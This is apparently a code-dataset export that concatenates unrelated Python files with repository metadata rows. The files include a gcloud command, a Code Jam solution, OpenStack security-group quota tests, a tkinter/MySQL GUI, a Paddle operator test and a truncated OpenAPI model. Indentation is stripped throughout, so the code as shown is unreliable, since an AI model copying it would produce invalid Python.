@staticmethod
def Args(parser):
flags.DOMAIN_FLAG.AddToParser(parser)
def Run(self, args):
console_io.PromptContinue(
prompt_string=('Deleting mapping [{0}]. This will stop your app from'
' serving from this domain.'.format(args.domain)),
cancel_on_no=True)
if self.ReleaseTrack() == base.ReleaseTrack.ALPHA:
client = api_client.AppengineDomainsApiAlphaClient.GetApiClient()
else:
client = api_client.AppengineDomainsApiClient.GetApiClient()
client.DeleteDomainMapping(args.domain)
log.DeletedResource(args.domain)
| [
"[email protected]"
] | |
7f7bc5dacb84f4e18c258d76fd91a9bb8cc3af3b | 54f352a242a8ad6ff5516703e91da61e08d9a9e6 | /Source Codes/CodeJamData/12/23/12.py | da0396d4cf15e8267cd6d9041247bc41bc9c3b63 | [] | no_license | Kawser-nerd/CLCDSA | 5cbd8a4c3f65173e4e8e0d7ed845574c4770c3eb | aee32551795763b54acb26856ab239370cac4e75 | refs/heads/master | 2022-02-09T11:08:56.588303 | 2022-01-26T18:53:40 | 2022-01-26T18:53:40 | 211,783,197 | 23 | 9 | null | null | null | null | UTF-8 | Python | false | false | 1,511 | py | # -*- coding:utf-8 -*-
import os, itertools
curr_dir = os.path.dirname(os.path.abspath(__file__))
srcfilename = os.path.join(curr_dir, 'C-large.in')
dstfilename = os.path.join(curr_dir, 'output.txt')
def solve(numbers_):
numbers = sorted(numbers_)
memory = dict((k, [k]) for k in numbers)
for r in xrange(2, len(numbers)):
combinations = itertools.combinations(numbers, r)
for combination in combinations:
s = sum(combination)
if s in memory:
r1 = memory[s]
r2 = combination
return r1, r2
memory[s] = combination
return 'Impossible'
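# Worked example (not in the original submission): for numbers_ = [1, 2, 3, 6]
# the memo starts as {1: [1], 2: [2], 3: [3], 6: [6]}; the first r=2
# combination (1, 2) sums to 3, which is already memoized, so solve() returns
# ([3], (1, 2)) -- two subsets with equal sums.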
if __name__ == '__main__':
with open(srcfilename, 'rb') as inp:
with open(dstfilename, 'wb') as outp:
lines = inp.readlines()
count = int(lines.pop(0))
outlines = []
for i in xrange(count):
line = lines[i]
numbers = [int(number) for number in line.split(' ')]
numbers.pop(0)
result = solve(numbers)
if result == 'Impossible':
outlines.append('Case #%d: Impossible\n' % (i+1,))
else:
r1, r2 = result
outlines.append('Case #%d:\n' % (i+1,))
outlines.append('%s\n' % ' '.join(['%d' % r1i for r1i in r1]))
outlines.append('%s\n' % ' '.join(['%d' % r2i for r2i in r2]))
outp.writelines(outlines)
| [
"[email protected]"
] | |
0716ae0a297c478efb4cabc07dd95d1ade9b0765 | 0c85cba348e9abace4f16dfb70531c70175dac68 | /cloudroast/networking/networks/api/security_groups/test_security_groups_quotas.py | 711c5f5a1d12b995b33e7c5f496a7e31ad6fa4c0 | [
"Apache-2.0"
] | permissive | RULCSoft/cloudroast | 31157e228d1fa265f981ec82150255d4b7876af2 | 30f0e64672676c3f90b4a582fe90fac6621475b3 | refs/heads/master | 2020-04-04T12:20:59.388355 | 2018-11-02T21:32:27 | 2018-11-02T21:32:27 | 155,923,262 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,301 | py | """
Copyright 2015 Rackspace
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from cafe.drivers.unittest.decorators import tags
from cloudcafe.networking.networks.extensions.security_groups_api.constants \
import SecurityGroupsErrorTypes, SecurityGroupsResponseCodes
from cloudroast.networking.networks.fixtures \
import NetworkingSecurityGroupsFixture
class SecurityGroupsQuotasTest(NetworkingSecurityGroupsFixture):
@classmethod
def setUpClass(cls):
"""Setting up test data"""
super(SecurityGroupsQuotasTest, cls).setUpClass()
# Setting up
cls.expected_secgroup = cls.get_expected_secgroup_data()
cls.expected_secgroup.name = 'test_secgroup_quotas'
def tearDown(self):
self.secGroupCleanUp()
super(SecurityGroupsQuotasTest, self).tearDown()
@tags('quotas')
def test_rules_per_group(self):
"""
@summary: Testing security rules quota per group
"""
secgroup = self.create_test_secgroup(self.expected_secgroup)
expected_secrule = self.get_expected_secrule_data()
expected_secrule.security_group_id = secgroup.id
rules_per_group = self.sec.config.max_rules_per_secgroup
self.create_n_security_rules_per_group(expected_secrule,
rules_per_group)
msg = ('Successfully created the expected security rules per group '
'allowed by the quota of {0}').format(rules_per_group)
self.fixture_log.debug(msg)
# Checking the quota is enforced
request_kwargs = dict(
security_group_id=expected_secrule.security_group_id,
raise_exception=False)
resp = self.sec.behaviors.create_security_group_rule(**request_kwargs)
neg_msg = ('(negative) Creating a security rule over the group quota'
' of {0}').format(rules_per_group)
self.assertNegativeResponse(
resp=resp, status_code=SecurityGroupsResponseCodes.CONFLICT,
msg=neg_msg, delete_list=self.delete_secgroups,
error_type=SecurityGroupsErrorTypes.OVER_QUOTA)
@tags('quotas')
def test_groups_per_tenant(self):
"""
@summary: Testing security groups quota per tenant
"""
groups_per_tenant = self.sec.config.max_secgroups_per_tenant
self.create_n_security_groups(self.expected_secgroup,
groups_per_tenant)
# Checking the quota is enforced
request_kwargs = dict(
name=self.expected_secgroup.name,
description=self.expected_secgroup.description,
raise_exception=False)
resp = self.sec.behaviors.create_security_group(**request_kwargs)
neg_msg = ('(negative) Creating a security group over the tenant quota'
' of {0}').format(groups_per_tenant)
status_code = SecurityGroupsResponseCodes.CONFLICT
error_type = SecurityGroupsErrorTypes.OVER_QUOTA
self.assertNegativeResponse(
resp=resp, status_code=status_code, msg=neg_msg,
delete_list=self.delete_secgroups,
error_type=error_type)
@tags('quotas')
def test_rules_per_tenant(self):
"""
@summary: Testing security rules quota per tenant
"""
expected_secrule = self.get_expected_secrule_data()
groups_per_tenant = self.sec.config.max_secgroups_per_tenant
rules_per_tenant = self.sec.config.max_rules_per_tenant
rules_per_group = rules_per_tenant / groups_per_tenant
secgroups = self.create_n_security_groups_w_n_rules(
self.expected_secgroup, expected_secrule, groups_per_tenant,
rules_per_group)
msg = ('Successfully created the expected security rules per tenant '
'allowed by the quota of {0}').format(rules_per_tenant)
self.fixture_log.debug(msg)
# Checking the quota is enforced
request_kwargs = dict(
security_group_id=secgroups[0].id,
raise_exception=False)
resp = self.sec.behaviors.create_security_group_rule(**request_kwargs)
neg_msg = ('(negative) Creating a security rule over the tenant quota'
' of {0}').format(rules_per_tenant)
self.assertNegativeResponse(
resp=resp, status_code=SecurityGroupsResponseCodes.CONFLICT,
msg=neg_msg, delete_list=self.delete_secgroups,
error_type=SecurityGroupsErrorTypes.OVER_QUOTA)
def create_n_security_groups_w_n_rules(self, expected_secgroup,
expected_secrule, groups_num,
rules_num):
"""
@summary: Creating n security groups with n rules
"""
secgroups = self.create_n_security_groups(expected_secgroup,
groups_num)
for group in secgroups:
expected_secrule.security_group_id = group.id
self.create_n_security_rules_per_group(expected_secrule, rules_num)
return secgroups
def create_n_security_groups(self, expected_secgroup, num):
"""
@summary: Creating n security groups
"""
secgroups = []
for x in range(num):
log_msg = 'Creating security group {0}'.format(x + 1)
self.fixture_log.debug(log_msg)
name = 'security_test_group_n_{0}'.format(x + 1)
expected_secgroup.name = name
secgroup = self.create_test_secgroup(expected_secgroup)
secgroups.append(secgroup)
msg = 'Successfully created {0} security groups'.format(num)
self.fixture_log.debug(msg)
return secgroups
def create_n_security_rules_per_group(self, expected_secrule, num):
"""
@summary: Creating n security rules within a security group and
verifying they are created successfully
"""
request_kwargs = dict(
security_group_id=expected_secrule.security_group_id,
raise_exception=False)
for x in range(num):
log_msg = 'Creating rule {0}'.format(x + 1)
self.fixture_log.debug(log_msg)
resp = self.sec.behaviors.create_security_group_rule(
**request_kwargs)
# Fail the test if any failure is found
self.assertFalse(resp.failures)
secrule = resp.response.entity
# Check the Security Group Rule response
self.assertSecurityGroupRuleResponse(expected_secrule, secrule)
msg = ('Successfully created {0} security rules at security group '
'{1}').format(num, expected_secrule.security_group_id)
self.fixture_log.debug(msg)
| [
"[email protected]"
] | |
d9f0bd32c021cff6d85d2b4c86f7c6a119a3be14 | 0912be54934d2ac5022c85151479a1460afcd570 | /Ch07_Code/GUI_MySQL.py | cf54d12400d1045cffa7dcdeaa05f864343ff849 | [
"MIT"
] | permissive | actuarial-tools/Python-GUI-Programming-Cookbook-Third-Edition | 6d9d155663dda4450d0b180f43bab46c24d18d09 | 8c9fc4b3bff8eeeda7f18381faf33c19e98a14fe | refs/heads/master | 2023-01-31T13:11:34.315477 | 2020-12-15T08:21:06 | 2020-12-15T08:21:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,876 | py | '''
Created on May 29, 2019
@author: Burkhard
'''
#======================
# imports
#======================
import tkinter as tk
from tkinter import ttk
from tkinter import scrolledtext
from tkinter import Menu
from tkinter import Spinbox
from Ch07_Code.ToolTip import ToolTip
from threading import Thread
from time import sleep
from queue import Queue
from tkinter import filedialog as fd
from os import path, makedirs
from tkinter import messagebox as mBox
from Ch07_Code.GUI_MySQL_class import MySQL
# Module level GLOBALS
GLOBAL_CONST = 42
fDir = path.dirname(__file__)
netDir = fDir + '\\Backup'
if not path.exists(netDir):
makedirs(netDir, exist_ok = True)
WIDGET_LABEL = ' Widgets Frame '
#===================================================================
class OOP():
def __init__(self):
# Create instance
self.win = tk.Tk()
# Add a title
self.win.title("Python GUI")
# Disable resizing the window
self.win.resizable(0,0)
# Create a Queue
self.guiQueue = Queue()
self.createWidgets()
# populate Tab 2 Entries
self.defaultFileEntries()
        # create MySQL instance (named mySQLDb so it does not collide with
        # the mySQL LabelFrame that createWidgets() also assigns to self)
        self.mySQLDb = MySQL()
def defaultFileEntries(self):
self.fileEntry.delete(0, tk.END)
self.fileEntry.insert(0, 'Z:\\') # bogus path
self.fileEntry.config(state='readonly')
self.netwEntry.delete(0, tk.END)
self.netwEntry.insert(0, 'Z:\\Backup') # bogus path
# Combobox callback
def _combo(self, val=0):
value = self.combo.get()
self.scr.insert(tk.INSERT, value + '\n')
# Spinbox callback
def _spin(self):
value = self.spin.get()
self.scr.insert(tk.INSERT, value + '\n')
# Checkbox callback
def checkCallback(self, *ignoredArgs):
# only enable one checkbutton
if self.chVarUn.get(): self.check3.configure(state='disabled')
else: self.check3.configure(state='normal')
if self.chVarEn.get(): self.check2.configure(state='disabled')
else: self.check2.configure(state='normal')
# Radiobutton callback function
def radCall(self):
radSel=self.radVar.get()
if radSel == 0: self.mySQL2.configure(text=WIDGET_LABEL + 'in Blue')
elif radSel == 1: self.mySQL2.configure(text=WIDGET_LABEL + 'in Gold')
elif radSel == 2: self.mySQL2.configure(text=WIDGET_LABEL + 'in Red')
# Exit GUI cleanly
def _quit(self):
self.win.quit()
self.win.destroy()
exit()
def methodInAThread(self, numOfLoops=10):
for idx in range(numOfLoops):
sleep(1)
self.scr.insert(tk.INSERT, str(idx) + '\n')
sleep(1)
print('methodInAThread():', self.runT.isAlive())
# Running methods in Threads
def createThread(self, num):
self.runT = Thread(target=self.methodInAThread, args=[num])
self.runT.setDaemon(True)
self.runT.start()
print(self.runT)
print('createThread():', self.runT.isAlive())
# textBoxes are the Consumers of Queue data
writeT = Thread(target=self.useQueues, daemon=True)
writeT.start()
# Create Queue instance
def useQueues(self):
# Now using a class member Queue
while True:
qItem = self.guiQueue.get()
print(qItem)
self.scr.insert(tk.INSERT, qItem + '\n')
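    # Hypothetical producer sketch (not in the original code): any worker
    # thread could feed the GUI by putting strings onto the same queue that
    # useQueues() consumes, e.g.:
    #
    #     def produceMessage(self, text):
    #         self.guiQueue.put(text)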
# Button callback
def insertQuote(self):
title = self.bookTitle.get()
page = self.pageNumber.get()
quote = self.quote.get(1.0, tk.END)
print(title)
print(quote)
        self.mySQLDb.insertBooks(title, page, quote)
# Button callback
def getQuote(self):
        allBooks = self.mySQLDb.showBooks()
print(allBooks)
self.quote.insert(tk.INSERT, allBooks)
# Button callback
def modifyQuote(self):
raise NotImplementedError("This still needs to be implemented for the SQL command.")
#####################################################################################
def createWidgets(self):
# Tab Control introduced here --------------------------------------
tabControl = ttk.Notebook(self.win) # Create Tab Control
tab1 = ttk.Frame(tabControl) # Create a tab
tabControl.add(tab1, text='MySQL') # Add the tab
tab2 = ttk.Frame(tabControl) # Add a second tab
tabControl.add(tab2, text='Widgets') # Make second tab visible
tabControl.pack(expand=1, fill="both") # Pack to make visible
# ~ Tab Control introduced here -----------------------------------------
# We are creating a container frame to hold all other widgets
self.mySQL = ttk.LabelFrame(tab1, text=' Python Database ')
self.mySQL.grid(column=0, row=0, padx=8, pady=4)
# Creating a Label
ttk.Label(self.mySQL, text="Book Title:").grid(column=0, row=0, sticky='W')
# Adding a Textbox Entry widget
book = tk.StringVar()
self.bookTitle = ttk.Entry(self.mySQL, width=34, textvariable=book)
self.bookTitle.grid(column=0, row=1, sticky='W')
# Adding a Textbox Entry widget
book1 = tk.StringVar()
self.bookTitle1 = ttk.Entry(self.mySQL, width=34, textvariable=book1)
self.bookTitle1.grid(column=0, row=2, sticky='W')
# Adding a Textbox Entry widget
book2 = tk.StringVar()
self.bookTitle2 = ttk.Entry(self.mySQL, width=34, textvariable=book2)
self.bookTitle2.grid(column=0, row=3, sticky='W')
# Creating a Label
ttk.Label(self.mySQL, text="Page:").grid(column=1, row=0, sticky='W')
# Adding a Textbox Entry widget
page = tk.StringVar()
self.pageNumber = ttk.Entry(self.mySQL, width=6, textvariable=page)
self.pageNumber.grid(column=1, row=1, sticky='W')
# Adding a Textbox Entry widget
page = tk.StringVar()
self.pageNumber1 = ttk.Entry(self.mySQL, width=6, textvariable=page)
self.pageNumber1.grid(column=1, row=2, sticky='W')
# Adding a Textbox Entry widget
page = tk.StringVar()
self.pageNumber2 = ttk.Entry(self.mySQL, width=6, textvariable=page)
self.pageNumber2.grid(column=1, row=3, sticky='W')
# Adding a Button
self.action = ttk.Button(self.mySQL, text="Insert Quote", command=self.insertQuote)
self.action.grid(column=2, row=1)
# Adding a Button
self.action1 = ttk.Button(self.mySQL, text="Get Quotes", command=self.getQuote)
self.action1.grid(column=2, row=2)
# Adding a Button
        self.action2 = ttk.Button(self.mySQL, text="Modify Quote", command=self.modifyQuote)
self.action2.grid(column=2, row=3)
# Add some space around each widget
for child in self.mySQL.winfo_children():
child.grid_configure(padx=2, pady=4)
quoteFrame = ttk.LabelFrame(tab1, text=' Book Quotation ')
quoteFrame.grid(column=0, row=1, padx=8, pady=4)
# Using a scrolled Text control
quoteW = 40; quoteH = 6
self.quote = scrolledtext.ScrolledText(quoteFrame, width=quoteW, height=quoteH, wrap=tk.WORD)
self.quote.grid(column=0, row=8, sticky='WE', columnspan=3)
# Add some space around each widget
for child in quoteFrame.winfo_children():
child.grid_configure(padx=2, pady=4)
#======================================================================================================
# Tab Control 2
#======================================================================================================
# We are creating a container frame to hold all other widgets -- Tab2
self.mySQL2 = ttk.LabelFrame(tab2, text=WIDGET_LABEL)
self.mySQL2.grid(column=0, row=0, padx=8, pady=4)
# Creating three checkbuttons
self.chVarDis = tk.IntVar()
self.check1 = tk.Checkbutton(self.mySQL2, text="Disabled", variable=self.chVarDis, state='disabled')
self.check1.select()
self.check1.grid(column=0, row=0, sticky=tk.W)
self.chVarUn = tk.IntVar()
self.check2 = tk.Checkbutton(self.mySQL2, text="UnChecked", variable=self.chVarUn)
self.check2.deselect()
self.check2.grid(column=1, row=0, sticky=tk.W )
self.chVarEn = tk.IntVar()
self.check3 = tk.Checkbutton(self.mySQL2, text="Toggle", variable=self.chVarEn)
self.check3.deselect()
self.check3.grid(column=2, row=0, sticky=tk.W)
# trace the state of the two checkbuttons
self.chVarUn.trace('w', lambda unused0, unused1, unused2 : self.checkCallback())
self.chVarEn.trace('w', lambda unused0, unused1, unused2 : self.checkCallback())
# Radiobutton list
colors = ["Blue", "Gold", "Red"]
self.radVar = tk.IntVar()
# Selecting a non-existing index value for radVar
self.radVar.set(99)
# Creating all three Radiobutton widgets within one loop
for col in range(3):
curRad = 'rad' + str(col)
curRad = tk.Radiobutton(self.mySQL2, text=colors[col], variable=self.radVar, value=col, command=self.radCall)
curRad.grid(column=col, row=6, sticky=tk.W, columnspan=3)
# And now adding tooltips
ToolTip(curRad, 'This is a Radiobutton control.')
# Create a container to hold labels
labelsFrame = ttk.LabelFrame(self.mySQL2, text=' Labels within a Frame ')
labelsFrame.grid(column=0, row=7, pady=6)
# Place labels into the container element - vertically
ttk.Label(labelsFrame, text="Choose a number:").grid(column=0, row=0)
ttk.Label(labelsFrame, text="Label 2").grid(column=0, row=1)
# Add some space around each label
for child in labelsFrame.winfo_children():
child.grid_configure(padx=6, pady=1)
number = tk.StringVar()
self.combo = ttk.Combobox(self.mySQL2, width=12, textvariable=number)
self.combo['values'] = (1, 2, 4, 42, 100)
self.combo.grid(column=1, row=7, sticky=tk.W)
self.combo.current(0)
self.combo.bind('<<ComboboxSelected>>', self._combo)
# Adding a Spinbox widget using a set of values
self.spin = Spinbox(self.mySQL2, values=(1, 2, 4, 42, 100), width=5, bd=8, command=self._spin)
        self.spin.grid(column=2, row=7, sticky='W', padx=6, pady=1)
# Using a scrolled Text control
scrolW = 40; scrolH = 1
self.scr = scrolledtext.ScrolledText(self.mySQL2, width=scrolW, height=scrolH, wrap=tk.WORD)
self.scr.grid(column=0, row=8, sticky='WE', columnspan=3)
# Create Manage Files Frame ------------------------------------------------
mngFilesFrame = ttk.LabelFrame(tab2, text=' Manage Files: ')
mngFilesFrame.grid(column=0, row=1, sticky='WE', padx=10, pady=5)
# Button Callback
def getFileName():
print('hello from getFileName')
fDir = path.dirname(__file__)
fName = fd.askopenfilename(parent=self.win, initialdir=fDir)
print(fName)
self.fileEntry.config(state='enabled')
self.fileEntry.delete(0, tk.END)
self.fileEntry.insert(0, fName)
if len(fName) > self.entryLen:
self.fileEntry.config(width=len(fName) + 3)
# Add Widgets to Manage Files Frame
lb = ttk.Button(mngFilesFrame, text="Browse to File...", command=getFileName)
lb.grid(column=0, row=0, sticky=tk.W)
#-----------------------------------------------------
file = tk.StringVar()
self.entryLen = scrolW - 4
self.fileEntry = ttk.Entry(mngFilesFrame, width=self.entryLen, textvariable=file)
self.fileEntry.grid(column=1, row=0, sticky=tk.W)
#-----------------------------------------------------
logDir = tk.StringVar()
self.netwEntry = ttk.Entry(mngFilesFrame, width=self.entryLen, textvariable=logDir)
self.netwEntry.grid(column=1, row=1, sticky=tk.W)
def copyFile():
import shutil
src = self.fileEntry.get()
file = src.split('/')[-1]
dst = self.netwEntry.get() + '\\'+ file
try:
shutil.copy(src, dst)
                mBox.showinfo('Copy File to Network', 'Success: File copied.')
except FileNotFoundError as err:
mBox.showerror('Copy File to Network', '*** Failed to copy file! ***\n\n' + str(err))
except Exception as ex:
mBox.showerror('Copy File to Network', '*** Failed to copy file! ***\n\n' + str(ex))
cb = ttk.Button(mngFilesFrame, text="Copy File To : ", command=copyFile)
cb.grid(column=0, row=1, sticky=tk.E)
# Add some space around each label
for child in mngFilesFrame.winfo_children():
child.grid_configure(padx=6, pady=6)
# Creating a Menu Bar ==========================================================
menuBar = Menu(tab1)
self.win.config(menu=menuBar)
# Add menu items
fileMenu = Menu(menuBar, tearoff=0)
fileMenu.add_command(label="New")
fileMenu.add_separator()
fileMenu.add_command(label="Exit", command=self._quit)
menuBar.add_cascade(label="File", menu=fileMenu)
# Add another Menu to the Menu Bar and an item
helpMenu = Menu(menuBar, tearoff=0)
helpMenu.add_command(label="About")
menuBar.add_cascade(label="Help", menu=helpMenu)
# Change the main windows icon
self.win.iconbitmap('pyc.ico')
# Using tkinter Variable Classes
strData = tk.StringVar()
strData.set('Hello StringVar')
# It is not necessary to create a tk.StringVar()
strData = tk.StringVar()
strData = self.spin.get()
# Place cursor into name Entry
self.bookTitle.focus()
# Add a Tooltip to the Spinbox
ToolTip(self.spin, 'This is a Spin control.')
# Add Tooltips to more widgets
ToolTip(self.bookTitle, 'This is an Entry control.')
ToolTip(self.action, 'This is a Button control.')
ToolTip(self.scr, 'This is a ScrolledText control.')
#======================
# Start GUI
#======================
oop = OOP()
oop.win.mainloop()
| [
"[email protected]"
] | |
47b06042aeb032ae4e939d3b48da59ba5b47905c | ce083128fa87ca86c65059893aa8882d088461f5 | /python/flask-webservices-labs/flask-spyne-fc20-labs/examples-fc20-labs/.venv/bin/pserve | aa6ac24579b1b2bb05f169edd556d6441a8b4c09 | [] | no_license | marcosptf/fedora | 581a446e7f81d8ae9a260eafb92814bc486ee077 | 359db63ff1fa79696b7bc803bcfa0042bff8ab44 | refs/heads/master | 2023-04-06T14:53:40.378260 | 2023-03-26T00:47:52 | 2023-03-26T00:47:52 | 26,059,824 | 6 | 5 | null | 2022-12-08T00:43:21 | 2014-11-01T18:48:56 | null | UTF-8 | Python | false | false | 325 | #!/root/NetBeansProjects/fedora/python/flask-webservices-labs/flask-spyne-fc20-labs/examples-fc20-labs/.venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from pyramid.scripts.pserve import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"[email protected]"
] | ||
0fdeff39871fc700ab63276af189ae59086ca209 | 9025fc04844a202f00e691728c87eb10906e87c3 | /Python/3/hue.py | 47ddef65c29489500d3964a4d7a381559351461c | [] | no_license | felipemarinho97/online-judge-exercices | e046e3fd951f4943c43e199f557d96f82d8ed286 | 28cff9b31431e1c1edeeba0b66689e871491ac0a | refs/heads/master | 2021-01-20T00:33:09.782364 | 2017-04-23T15:19:04 | 2017-04-23T15:19:04 | 89,148,286 | 0 | 0 | null | 2017-04-23T15:21:01 | 2017-04-23T14:34:29 | Python | UTF-8 | Python | false | false | 580 | py | # coding: utf-8
# Melhor Ataque (Best Attack) - online-judge exercise; the printed strings
# stay in Portuguese to match the judge's expected output
# Felipe Marinho (C) | 116110223 | <[email protected]>
times = int(raw_input())
lista_times = []
lista_gols = []
total_gols = 0
maior = -1
for i in range(times) :
time = raw_input()
lista_times.append(time)
gols = int(raw_input())
lista_gols.append(gols)
total_gols += gols
if lista_gols[i] > maior :
maior = gols
print """Time(s) com melhor ataque (%i gol(s)):""" % maior
for i in range(times) :
if lista_gols[i] == maior :
print lista_times[i]
print ""
print "Média de gols marcados: %.1f" % (total_gols/float(times))
| [
"[email protected]"
] | |
0d68ac6e207b37d788e51c89ec289b18727b302d | c22c83592571b64c3da4a3f3c4d1bbaaee50a318 | /encryption.py | ea49016c24dde788787f3a42249522bd0f17076a | [] | no_license | tt-n-walters/thebridge-week1 | eaef2887122dd4f778ab94ab3c819f1e63a1985f | 8598125af12b21794e93f09407984009c36aaf25 | refs/heads/master | 2023-06-16T14:31:45.955254 | 2021-07-09T12:14:40 | 2021-07-09T12:14:40 | 382,301,941 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 180 | py | import hashlib
password = "password1"
encoded_password = password.encode()
encrypted = hashlib.sha256(encoded_password).hexdigest()
# https://resources.nicowalters.repl.co/hash
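# Hypothetical verification sketch (not in the original snippet): a login
# attempt is checked by hashing it the same way and comparing digests.
attempt = "password1"
if hashlib.sha256(attempt.encode()).hexdigest() == encrypted:
    print("Password accepted")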
| [
"[email protected]"
] | |
ccfd104c316ff6d373be371b1562c7625f50c37c | 41f09c4f9990f8d2ce57aef92be1580f8a541656 | /show_lbiflist.py | 69778715a9ac37d8e3b06516f36e4ea83cfb6002 | [] | no_license | jebpublic/pybvccmds | d3111efe6f449c3565d3d7f1c358bdd36bc1a01a | 997eead4faebf3705a83ce63b82d853730b23fbf | refs/heads/master | 2016-09-05T18:56:52.509806 | 2015-02-25T17:41:47 | 2015-02-25T17:41:47 | 31,315,416 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,472 | py | #!/usr/bin/python
import sys
import json
import pybvc
from pybvc.netconfdev.vrouter.vrouter5600 import VRouter5600
from pybvc.common.status import STATUS
from pybvc.controller.controller import Controller
from pybvc.common.utils import load_dict_from_file
if __name__ == "__main__":
f = "cfg.yml"
d = {}
if(load_dict_from_file(f, d) == False):
print("Config file '%s' read error: " % f)
exit()
try:
ctrlIpAddr = d['ctrlIpAddr']
ctrlPortNum = d['ctrlPortNum']
ctrlUname = d['ctrlUname']
ctrlPswd = d['ctrlPswd']
nodeName = d['nodeName']
nodeIpAddr = d['nodeIpAddr']
nodePortNum = d['nodePortNum']
nodeUname = d['nodeUname']
nodePswd = d['nodePswd']
except:
print ("Failed to get Controller device attributes")
exit(0)
ctrl = Controller(ctrlIpAddr, ctrlPortNum, ctrlUname, ctrlPswd)
vrouter = VRouter5600(ctrl, nodeName, nodeIpAddr, nodePortNum, nodeUname, nodePswd)
print ("<<< 'Controller': %s, '%s': %s" % (ctrlIpAddr, nodeName, nodeIpAddr))
result = vrouter.get_loopback_interfaces_list()
status = result[0]
if(status.eq(STATUS.OK) == True):
print "Loopback interfaces:"
dpIfList = result[1]
print json.dumps(dpIfList, indent=4)
else:
print ("\n")
print ("!!!Failed, reason: %s" % status.brief().lower())
print ("%s" % status.detail())
sys.exit(0)
| [
"[email protected]"
] | |
17aec2e9e4241eb7c8589ae7042a57c2077d973f | 209c876b1e248fd67bd156a137d961a6610f93c7 | /python/paddle/fluid/tests/unittests/xpu/test_reduce_max_op_xpu.py | 9256b135ba8d04c2c3984633b176dd0a68c66765 | [
"Apache-2.0"
] | permissive | Qengineering/Paddle | 36e0dba37d29146ebef4fba869490ecedbf4294e | 591456c69b76ee96d04b7d15dca6bb8080301f21 | refs/heads/develop | 2023-01-24T12:40:04.551345 | 2022-10-06T10:30:56 | 2022-10-06T10:30:56 | 544,837,444 | 0 | 0 | Apache-2.0 | 2022-10-03T10:12:54 | 2022-10-03T10:12:54 | null | UTF-8 | Python | false | false | 2,573 | py | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import numpy as np
import sys
sys.path.append("..")
import paddle
from op_test import OpTest
from op_test_xpu import XPUOpTest
from xpu.get_test_cover_info import create_test_class, get_xpu_op_support_types, XPUOpTestWrapper
paddle.enable_static()
class XPUTestReduceMaxOp(XPUOpTestWrapper):
def __init__(self):
self.op_name = 'reduce_max'
class XPUTestReduceMaxBase(XPUOpTest):
def setUp(self):
self.place = paddle.XPUPlace(0)
self.init_case()
self.set_case()
def set_case(self):
self.op_type = 'reduce_max'
self.attrs = {
'use_xpu': True,
'reduce_all': self.reduce_all,
'keep_dim': self.keep_dim
}
self.inputs = {'X': np.random.random(self.shape).astype("float32")}
if self.attrs['reduce_all']:
self.outputs = {'Out': self.inputs['X'].max()}
else:
self.outputs = {
'Out':
self.inputs['X'].max(axis=self.axis,
keepdims=self.attrs['keep_dim'])
}
def init_case(self):
self.shape = (5, 6, 10)
self.axis = (0, )
self.reduce_all = False
self.keep_dim = False
def test_check_output(self):
self.check_output_with_place(self.place)
def test_check_grad(self):
self.check_grad_with_place(self.place, ['X'], 'Out')
class XPUTestReduceMaxCase1(XPUTestReduceMaxBase):
def init_case(self):
self.shape = (5, 6, 10)
self.axis = (0, )
self.reduce_all = False
self.keep_dim = True
support_types = get_xpu_op_support_types('reduce_max')
for stype in support_types:
create_test_class(globals(), XPUTestReduceMaxOp, stype)
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
95f07028ed1317b33c687e3f152ed408d54accea | 0d2f636592dc12458254d793f342857298c26f12 | /11-2(tag).py | 1baa801108cd7920160b82b12b955e92548f7030 | [] | no_license | chenpc1214/test | c6b545dbe13e672f11c58464405e024394fc755b | 8610320686c499be2f5fa36ba9f11935aa6d657b | refs/heads/master | 2022-12-13T22:44:41.256315 | 2020-09-08T16:25:49 | 2020-09-08T16:25:49 | 255,796,035 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 301 | py | def mymax(n1,n2):
    if n1 > n2:
        print("The larger value is:", n1)
    else:
        print("The larger value is:", n2)
x1,x2 = eval(input("Enter 2 numbers: "))
mymax(x1,x2)
"""My own attempt:
def mymax(n1,n2):
    print("The maximum is:", max(n1,n2))
a,b = eval(input("Enter 2 numbers: "))
mymax(a,b)"""
| [
"[email protected]"
] | |
b8fd4f4290f8a0877f2b1b3efb49106e25a3f001 | 43ab33b2f50e47f5dbe322daa03c86a99e5ee77c | /rcc/models/od_mcomplex_type_definition_method_def.py | 07a0da5592495c471d676699b1ab4f6c2e885f62 | [] | no_license | Sage-Bionetworks/rcc-client | c770432de2d2950e00f7c7bd2bac22f3a81c2061 | 57c4a621aecd3a2f3f9faaa94f53b2727992a01a | refs/heads/main | 2023-02-23T05:55:39.279352 | 2021-01-21T02:06:08 | 2021-01-21T02:06:08 | 331,486,099 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,896 | py | # coding: utf-8
"""
nPhase REST Resource
REDCap REST API v.2 # noqa: E501
The version of the OpenAPI document: 2.0
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from rcc.configuration import Configuration
class ODMcomplexTypeDefinitionMethodDef(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'description': 'ODMcomplexTypeDefinitionDescription',
